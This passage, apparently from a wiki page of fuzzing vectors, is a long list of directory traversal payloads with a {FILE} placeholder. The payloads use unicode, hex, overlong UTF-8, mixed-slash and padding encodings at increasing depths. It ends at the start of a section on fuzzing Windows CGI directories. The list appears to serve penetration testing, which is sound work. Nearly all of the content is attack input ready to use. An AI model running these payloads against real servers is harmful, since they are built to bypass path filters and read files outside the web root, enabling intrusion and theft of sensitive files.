%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI   (Update: 17 March 2010)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
